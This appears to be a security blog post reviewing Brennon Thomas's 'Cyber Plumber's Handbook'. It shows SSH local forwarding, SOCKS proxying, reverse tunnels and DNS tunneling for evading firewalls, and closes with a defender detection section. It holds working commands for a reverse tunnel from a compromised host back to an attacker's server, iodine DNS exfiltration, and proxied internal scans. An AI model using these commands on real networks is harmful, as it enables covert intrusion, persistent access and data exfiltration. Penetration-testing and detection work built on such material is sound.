Securityby The Ghost in The Prompt2026-01-258 min read

The 2026 Refactor: Bending the Pipes

A firewall is a set of rules. Rules have exceptions. Tunneling finds them. Brennon Thomas wrote the plumber's handbook and in 2026 every lesson in it still works — the pipes are just carrying more interesting cargo.

A firewall is a set of rules about which traffic is allowed through which ports to which destinations.

Rules have exceptions. Exceptions have geometry. If you understand the geometry, you do not need to break the rules — you route around them through channels the rules were not written to see.

That is the plumber's mindset, and Brennon Thomas's Cyber Plumber's Handbook is the field manual for it. Written as a practical guide to SSH tunneling, pivoting, and traffic redirection for penetration testers, it documents techniques that predate modern security tooling and remain fully operational in 2026 because the underlying protocols have not changed. SSH is still SSH. TCP is still TCP. The pipe is still a pipe.

The sophistication of the monitoring has increased. The geometry of the evasion has not.

Local Port Forwarding: The Wormhole

The entry point is ssh -L. You tell the SSH client to listen on a local port and forward everything it receives through the encrypted tunnel to a destination the remote server can reach.

# Forward local 5432 to an internal database through the jumpbox
ssh -L 5432:database.internal:5432 [email protected]

# Now connect as if the database is sitting on your machine
psql -h localhost -p 5432 -U dbuser

To your client, the database is on localhost. To the network, you are maintaining an SSH session to a jumpbox — which is what developers do all day. The database traffic never appears in the logs as database traffic. It appears as SSH.

In 2016 this bypassed basic firewalls that blocked port 5432 while allowing 22. In 2026 it bypasses identity-aware proxies that monitor HTTPS for anomalous data patterns. The proxy sees SSH. The SSH is carrying the database session. The proxy's behavioral model was trained on HTTPS — it does not have a signature for what developer SSH traffic looks like when it is secretly running an exfiltration.

The geometry did not change. The value of the geometry increased because the monitoring layer got more sophisticated around the ports it was watching and left SSH mostly alone.

SOCKS Proxy: Routing Tools That Don't Know About Proxies

ssh -D opens a SOCKS5 proxy on a local port that routes all traffic through the tunnel. Combined with proxychains, you can force any tool — including tools that have no native proxy support — through the tunnel as if it were running from the remote machine.

# Open SOCKS5 proxy on local 1080 through a cloud instance in a specific region
ssh -D 1080 [email protected]

# Route nmap through it — scan appears to originate from the instance
proxychains nmap -sV -p 22,80,443,3306 10.0.0.0/24

# Route curl through it — HTTP request appears to come from the instance
proxychains curl https://internal-api.example.com/admin

The geofencing use case is underappreciated. Cloud assets and internal APIs frequently allowlist by IP range or region. A SOCKS proxy through a rented or compromised instance in the allowed region is not a VPN — it leaves a different fingerprint, uses legitimate SSH infrastructure, and routes tool traffic that commercial VPNs would not handle cleanly.

proxychains is the force multiplier. Older network scanners, custom scripts, database clients, legacy tools — none of them were built with proxy support. proxychains intercepts their socket calls at the library level and routes them through the SOCKS tunnel. The tools do not know they are being proxied. They run exactly as normal. Their traffic arrives from the remote instance.

The Reverse Tunnel: The Door That Opens from Inside

This is the technique that matters most in 2026 and the one Thomas treats with appropriate gravity.

Most enterprise firewalls operate on a default-deny posture for inbound traffic and a permissive posture for outbound. The logic is sensible: the organization controls what leaves, the internet does not get to initiate connections inward. This posture defeats a large fraction of traditional attack patterns.

The reverse tunnel inverts the direction.

# From the compromised internal host — initiate outbound SSH to attacker's server
# Remote port 2222 on the attacker's server tunnels back to localhost:22 on the victim
ssh -R 2222:localhost:22 [email protected] -N

# Attacker then connects back through the tunnel from their own server
ssh -p 2222 localhost
# Now inside the network — on the compromised machine

The firewall sees an outbound SSH connection from an internal host to an external server. Outbound SSH is allowed. The firewall logs an allowed session and moves on.

What the firewall did not see: the remote port forward that turned that outbound session into a persistent inbound channel. The attacker's server now has a door into the network that will reopen every time the compromised host reconnects — which a persistent agent will do automatically on restart, on network reconnect, on schedule.

The defender only sees traffic between the compromised host and the external server. The attacker's actual IP, their actual infrastructure, their actual location — all of it is behind the plumbing. The ghost location stays hidden behind the pipe.

The Escalation Ladder

SSH is the clean solution. When it is blocked, Thomas documents the escalation:

HACK LOVE BETRAY
COMING SOON

HACK LOVE BETRAY

Mobile-first arcade trench run through leverage, trace burn, and betrayal. The City moves first. You keep up or you get swallowed.

VIEW GAME FILE

DNS tunneling. DNS queries are allowed almost everywhere — blocking DNS breaks too much. A DNS tunnel encodes data in subdomain queries, exfiltrates it to an attacker-controlled DNS server, and reconstructs the stream.

# iodine DNS tunnel — runs data through DNS queries
# Server side (attacker controls tunnel.yourdomain.com)
iodined -f -P s3cr3t 10.99.0.1 tunnel.yourdomain.com

# Client side (from behind the restrictive firewall)
iodine -f -P s3cr3t tunnel.yourdomain.com
# Now have a network interface — route traffic through it

High latency. Low bandwidth. Nearly impossible to block without breaking DNS resolution entirely. Used for exfiltration when everything else has been closed.

ICMP tunneling. Ping is allowed in environments where even DNS is monitored. ICMP carries a payload field. That payload field carries data.

Shadowsocks and traffic obfuscation. When the network is Zero Trust and all outbound traffic is inspected, the fallback is making the tunnel look like nothing in particular — random TLS-encrypted junk that does not pattern-match to known protocols. Shadowsocks was designed to evade Chinese firewall deep packet inspection. In 2026 it sees use in environments with equally aggressive traffic analysis.

Each step up the ladder is slower and noisier. The plumber's job is to find the lowest rung that works.

Blue Team: What the Tunnel Looks Like from the Other Side

The detection problem for defenders is that legitimate and malicious SSH traffic look identical at the protocol level. The tells are behavioral.

Volume anomalies on long-lived sessions. A developer SSH session to a jumpbox produces a characteristic traffic pattern — bursts of interactive traffic, keystroke-sized packets, periods of silence. A tunnel carrying database traffic or a remote desktop session produces sustained throughput in one direction. Netflow analysis that baselines per-session bandwidth and flags sustained high-volume SSH sessions catches this.

Servers initiating SSH outbound. Interactive reverse tunnels require the compromised host to initiate SSH to an external server. Servers do not do this in normal operation. An EDR alert on sshd spawning outbound connections, or a firewall rule that logs server-to-external SSH, surfaces the callback pattern.

DNS query length distribution. Legitimate DNS queries have a characteristic subdomain length distribution. DNS tunnel queries contain encoded data — they produce longer, higher-entropy subdomains with unusual character distribution. A DNS monitoring system watching for queries with subdomains exceeding 40 characters or with Shannon entropy above the baseline for the environment catches iodine and similar tools.

SOCKS on unexpected ports. proxychains routes through SOCKS. SOCKS has a handshake. An IDS with signatures for SOCKS protocol behavior on non-standard ports catches tools being proxied through tunnels that opened on high ports.

The timing correlation attack. If the monitoring system can see both the internal compromised host's outbound traffic and the external server's inbound traffic, correlation on timing and volume can reconstruct the tunnel relationship even when the traffic content is encrypted. This is expensive to run at scale and requires visibility into both sides — but for high-value targets it is the technique that breaks the geometry.

The 2026 Verdict

The perimeter is dead, the industry keeps saying.

Ports still exist. IP addresses still exist. Protocols still have payload fields. The fundamental geometry of tunneling — wrap one thing inside another, route it through a channel the rules do not cover — has not changed since the techniques Thomas documented were first developed.

The monitoring has become smarter. The evasion has had to become quieter. The escalation ladder has grown more rungs. But the pipe is still a pipe, and the plumber who understands the geometry is still operating in territory the firewall was not built to see.

Thomas wrote the handbook. The refactor keeps it current.

GhostInThePrompt.com // Encryption is the lead. Tunneling is the path. Be the plumber.

Reference: 'The Cyber Plumber's Handbook' — Brennon Thomas (2018).

Continue Reading

security

Poisoning the Watcher: Image Payloads Become the Supply Chain in Employee Monitoring

On an engagement that wasn't even about employee monitoring I watched an Insightful agent ingest whatever a worker's screen showed, ship it to a multi-tenant cloud, run it through an AI classifier, and render the result back to managers across thousands of customer companies. The screen is the most hostile surface in the building. The entire monitoring industry is built around trusting it. This is the supply chain everyone forgot to draw on the whiteboard.

security

Malware Development for Ethical Hackers: To Catch a Wolf

Zhussupov's book makes an argument most security curricula avoid: you cannot defend against techniques you haven't written yourself. XOR obfuscation, dynamic API resolution, DLL hijacking — the red team toolkit, explained.